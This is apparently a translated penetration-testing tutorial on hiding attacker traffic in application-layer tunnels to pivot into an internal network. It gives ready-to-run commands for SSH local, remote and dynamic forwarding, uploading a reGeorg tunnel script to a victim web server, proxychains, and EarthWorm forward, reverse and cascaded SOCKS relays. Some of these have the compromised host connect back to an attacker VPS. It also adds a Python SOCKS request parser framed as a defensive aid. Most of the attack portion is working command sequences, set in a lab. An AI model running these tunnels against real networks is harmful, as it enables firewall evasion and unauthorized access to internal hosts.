In Intranet penetration test: hidden communication tunnel technology (part 1), we explained network layer tunneling (IPv6 tunnels, ICMP tunnels) and transport layer tunneling (TCP tunnels, UDP tunnels, conventional port forwarding). Nowadays a large share of TCP and UDP communication is intercepted by defensive systems, and traditional socket tunnels are on the verge of being phased out; hard-to-block protocols such as DNS, ICMP and HTTP/HTTPS have become the main channels attackers use to control a tunnel. In this part we give an experimental walkthrough of application layer tunnels and SOCKS proxy technology. The application layer DNS tunnel will get its own dedicated article later.
Application layer tunneling technology
The application layer is the seventh layer of the seven-layer OSI model. It interfaces directly with application programs and provides common network application services. Application layer tunneling mainly uses the ports provided by application software to carry data; the commonly used protocols are SSH, HTTP/HTTPS and DNS. Here we mainly explain SSH and HTTP/HTTPS; the DNS tunnel will be covered in a dedicated article later.
SSH is a security protocol at the application layer, designed to provide security for remote login sessions and other network services. Using SSH effectively prevents information leakage during remote management. SSH started as a program on UNIX systems and quickly spread to other operating platforms; the SSH client is available for many of them, and almost all UNIX platforms, including HP-UX, Linux, AIX, Solaris, Digital UNIX and Irix, can run SSH.
In general, SSH traffic is allowed through firewalls and border devices, and the SSH session is encrypted, so it is difficult to tell a legitimate SSH session from a tunnel established by an attacker; this is why attackers often use it. Once an attacker has used an SSH tunnel to get past firewall restrictions, he can establish TCP connections that were not possible before.
ssh username@ip -p <port number>
-C: compress transmitted data, increasing transfer speed
-f: run ssh in the background so it does not occupy the current shell
-N: do not execute a remote command; no interactive session is opened after connecting
-g: allow remote hosts to connect to the local forwarded port
-L: local port forwarding
-R: remote port forwarding
-D: dynamic forwarding (SOCKS proxy)
-p: specify the ssh port
Lab environment:
Attacker VPS: simulated external network IP 192.168.1.101
Intranet web server: simulated external network IP 192.168.103, intranet IP 192.168.52.128
Intranet victim machine (Windows Server 8): intranet IP 192.168.52.138
ssh -CfNg -L 1153:192.168.52.138:3389 <user>@<springboard> // local port forwarding: 1153 is the VPS port, 192.168.52.138 the target machine IP, 3389 the target port; the attacker VPS actively connects to the web server (springboard)
ssh -CfNg -R 3307:192.168.52.138:3389 <user>@<vps> // remote port forwarding: 3307 is the VPS port, 192.168.52.138 the target machine IP, 3389 the target port; the victim host actively connects to the VPS
ssh -CfNg -D 7000 <user>@<intranet web server> // dynamic forwarding: a SOCKS proxy listening on local port 7000
Dynamic port forwarding here actually establishes an SSH-encrypted SOCKS proxy channel. A SOCKS proxy simply connects the system on one end to the other end: your network requests are sent through the channel between you and the target machine, and one end forwards them to the other. Any program that supports the SOCKS protocol can use this encrypted channel for proxied access.
HTTP, the hypertext transfer protocol, is a very simple communication protocol and the most widely used one for transferring information on the Internet. Some local area networks restrict protocols and only allow users to reach external websites over HTTP. An HTTP service proxy is then used to forward all traffic into the intranet.
Download link: https://github.com/sensepost/reGeorg
First of all, we need to understand the difference between a forward proxy and a reverse proxy:
Forward proxy: to access Rhost, Lhost sends a request to the proxy server and specifies Rhost as the target; the proxy forwards the request to Rhost and returns the content it obtains to Lhost. Simply put, with a forward proxy the proxy visits Rhost on our behalf.
Reverse proxy: in contrast to the forward proxy, Lhost only sends ordinary requests to the proxy; the proxy decides where to forward them and hands the returned data back. The advantage is that this still works for penetration when a firewall only lets proxy traffic in and out.
Simply put, a forward proxy means the attacker actively reaches the target machine through the proxy, and a reverse proxy means the target machine actively connects out through the proxy. The tools we usually use, reDuh and tunna, like reGeorg, are all forward proxies: the user uploads a proxy script to the server, a local program connects to that script, and the script acts as the proxy that forwards ports and traffic.
Upload tunnel.(aspx|ashx|jsp|php) to the target web server, choosing the file that matches the language the remote server supports. The target here is a PHP server, so we upload tunnel.nosocket.php. The PHP version comes in a socket variant and a no-socket variant: tunnel.php needs the dl() function to load the socket module, which requires changing php.ini, so we use tunnel.nosocket.php.
python reGeorgSocksProxy.py -u http://192.168.1.7/tunnel.nosocket.php -p 9999
git clone https://github.com/rofl0r/proxychains-ng.git
cd proxychains-ng
./configure
make && make install
cp ./src/proxychains.conf /etc/proxychains.conf
cd .. && rm -rf proxychains-ng
Add at the end of /etc/proxychains.conf:
socks5 127.0.0.1 9999 # 9999 is your own port; it must match the port set in reGeorg (-p 9999 above)
proxychains4 nmap 192.168.52.138 -Pn -sT -p 3389 // -Pn and -sT are required, since a SOCKS proxy only carries complete TCP connections
proxychains4 rdesktop 192.168.52.138
A SOCKS proxy is an all-purpose proxy: like a patch panel with many jumpers, it simply connects the system on one end to the other end. It supports multiple protocols, including HTTP and FTP requests and other kinds of traffic. There are two versions, SOCKS 4 and SOCKS 5: SOCKS 4 only supports TCP, while SOCKS 5 supports both TCP and UDP and also supports various authentication mechanisms and other protocols. Its standard port is 1080. The proxy server that speaks the SOCKS protocol is the SOCKS server, a general-purpose proxy server. Using SOCKS to communicate with the target intranet computers avoids repeated port forwarding.
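To make concrete what travels through the SOCKS channel that ssh -D, reGeorg and EW expose, and the SOCKS 4 versus SOCKS 5 distinction just described, here is an added Python example (not from the article or any of these tools) that decodes SOCKS4/4a and SOCKS5 requests the way a defender inspecting bytes captured on a suspected proxy port would; the sample request at the bottom is constructed.

```python
import ipaddress
import struct
from collections import namedtuple

# Decoded request: version, command name, destination host, destination port.
SocksRequest = namedtuple("SocksRequest", "version command host port")
SOCKS5_CMDS = {1: "CONNECT", 2: "BIND", 3: "UDP ASSOCIATE"}  # SOCKS5 adds UDP
SOCKS4_CMDS = {1: "CONNECT", 2: "BIND"}                      # SOCKS4 is TCP only

def parse_socks5_request(data: bytes) -> SocksRequest:
    """Parse a SOCKS5 request (RFC 1928, section 4): VER CMD RSV ATYP DST.ADDR DST.PORT."""
    if len(data) < 4 or data[0] != 5 or data[2] != 0:
        raise ValueError("not a SOCKS5 request")
    cmd, atyp = data[1], data[3]
    if atyp == 1:    # IPv4 address, 4 bytes
        host, rest = str(ipaddress.IPv4Address(data[4:8])), data[8:]
    elif atyp == 3:  # domain name, one length byte then the name
        host, rest = data[5:5 + data[4]].decode("ascii"), data[5 + data[4]:]
    elif atyp == 4:  # IPv6 address, 16 bytes
        host, rest = str(ipaddress.IPv6Address(data[4:20])), data[20:]
    else:
        raise ValueError(f"unknown ATYP {atyp}")
    if len(rest) < 2:
        raise ValueError("truncated DST.PORT")
    port = struct.unpack("!H", rest[:2])[0]
    return SocksRequest(5, SOCKS5_CMDS.get(cmd, f"0x{cmd:02x}"), host, port)

def parse_socks4_request(data: bytes) -> SocksRequest:
    """Parse a SOCKS4/4a request: VN CD DSTPORT DSTIP USERID NUL [DOMAIN NUL]."""
    if len(data) < 9 or data[0] != 4:
        raise ValueError("not a SOCKS4 request")
    port = struct.unpack("!H", data[2:4])[0]
    ip = ipaddress.IPv4Address(data[4:8])
    userid_end = data.index(b"\x00", 8)  # ValueError if USERID is not NUL-terminated
    host = str(ip)
    if ip.packed[:3] == b"\x00\x00\x00" and ip.packed[3] != 0:  # SOCKS4a: 0.0.0.x, domain follows USERID
        host = data[userid_end + 1:data.index(b"\x00", userid_end + 1)].decode("ascii")
    return SocksRequest(4, SOCKS4_CMDS.get(data[1], f"0x{data[1]:02x}"), host, port)

def parse_socks_request(data: bytes) -> SocksRequest:
    """Dispatch on the version byte; anything else (e.g. plain HTTP) is rejected."""
    if data[:1] == b"\x05":
        return parse_socks5_request(data)
    if data[:1] == b"\x04":
        return parse_socks4_request(data)
    raise ValueError("not a SOCKS request")

# Constructed sample: the CONNECT that a SOCKS5 client sends for 192.168.52.138:3389,
# i.e. what "proxychains4 rdesktop 192.168.52.138" pushes into the tunnel entry port.
SAMPLE_CONNECT = b"\x05\x01\x00\x01" + bytes([192, 168, 52, 138]) + struct.pack("!H", 3389)
```

Seeing the destination in clear text inside the SOCKS request is also why the tunnel's outer transport (SSH, HTTPS) matters: only that layer hides where the proxied connections go.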
Typical scenarios:
1. In the internal network, the server can access the external network freely.
2. In the internal network, the server can access the external network, but a firewall on the server rejects connections to sensitive ports.
3. In the internal network, the server only exposes certain ports (for example port 80) and cannot access the external network.
Download link: https://github.com/rootkiter/EarthWorm
EW is a portable network penetration tool with two core functions: setting up a SOCKS v5 service and port forwarding. It can complete network penetration in complex network environments. EarthWorm can open a network tunnel in "forward", "reverse", "multi-level cascade" and other ways to reach deep into a network, breaking through network restrictions with the earthworm's unique means and loosening the ground under the firewall. The toolkit contains multiple executables for different operating systems (Linux, Windows, Mac OS and ARM-Linux are all included).
Download link: https://github.com/sensepost/reGeorg
The main function of reGeorg is to forward a port of the intranet server to the local machine through an HTTP(S) tunnel, forming a loop. It lets us reach ports that the target server has open only internally (or that a port policy restricts). reGeorg uses a webshell to establish a SOCKS proxy for intranet penetration; the server must support one of ASPX, PHP or JSP.
Download link: http://www.sockscap64.com/
SocksCap64 is a very useful proxy tool for Windows; it makes Windows applications access the network through a SOCKS proxy server.
Download link: https://www.proxifier.com/
Proxifier is also a very easy-to-use global proxy software, which provides cross-platform port forwarding and proxy functions, and is suitable for Windows, Linux, and Mac OS platforms.
Download link: https://github.com/rofl0r/proxychains-ng
ProxyChains implements a global proxy under Linux and is very easy to use. It can make any application access the Internet through a proxy, passes both TCP and DNS traffic through the proxy tunnel, and supports HTTP, SOCKS 4 and SOCKS 5 proxy servers.
Let me talk about the specific usage of these tools.
EW has six command formats, namely ssocksd, rcsocks, rssocks, lcx_slave, lcx_listen, lcx_tran. The ssocksd command is used for forward connections in a normal network environment, rcsocks and rssocks are used for rebound connections, and other commands are used for multi-level cascading in complex network environments.
(1) Forward SOCKS 5 server
This applies when the target machine has an external IP address. As shown in the figure above, the simulated external IP of the intranet web server is 192.168.1.7. Upload the matching ew binary to the web server and execute:
ew_for_Win.exe -s ssocksd -l 888 // on the web server: start a SOCKS service listening on port 888
proxychains4 rdesktop 192.168.52.138 // on the attacker machine, with proxychains pointed at 192.168.1.7:888
(2) Reverse SOCKS 5 server
The forward SOCKS 5 server applies when the target machine has an external IP address. If the target machine has no public IP address, how do we access internal resources?
./ew_for_linux64 -s rcsocks -l 1080 -e 1234 // on the public VPS: accept SOCKS clients on port 1080 and wait for the reverse connection on port 1234
ew_for_Win.exe -s rssocks -d 39.xxx.xxx.210 -e 1234 // on the target machine: connect back to the VPS port 1234 and provide the SOCKS service
proxychains4 rdesktop 192.168.52.141 // on the attacker machine, with proxychains pointed at the VPS port 1080
(3) Secondary network environment (a)
This applies when the target machine (host A) has an external IP address.
ew_for_Win.exe -s ssocksd -l 1234 // on host B (192.168.52.138): start the SOCKS service on port 1234
ew_for_Win.exe -s lcx_tran -l 1080 -f 192.168.52.138 -g 1234 // on host A: listen on port 1080 and relay to host B's port 1234
(4) Secondary network environment (b)
The previous case applies when host A has an external IP address. If the target machine has no public IP address, what do we do?
Here we cannot reach host A directly as in the previous case, so we cannot use the SOCKS service on host B through it; instead we reach host B's SOCKS service by way of the VPS.
We first upload ew to the public VPS and add a relay tunnel there: listen on port 1080 and send the proxy requests received on port 1080 to port 1234. Execute:
ew_for_linux64 -s lcx_listen -l 1080 -e 1234 // on the public VPS
ew_for_Win.exe -s ssocksd -l 999 // on host B: start the SOCKS service on port 999
ew_for_Win.exe -s lcx_slave -d 39.xxx.xxx.210 -e 1234 -f 192.168.52.138 -g 999 // on host A: connect the VPS port 1234 to host B's port 999
Open SocksCap64 and add the application you want to proxy (just drag the executable in once you have found it); here I add the remote desktop program.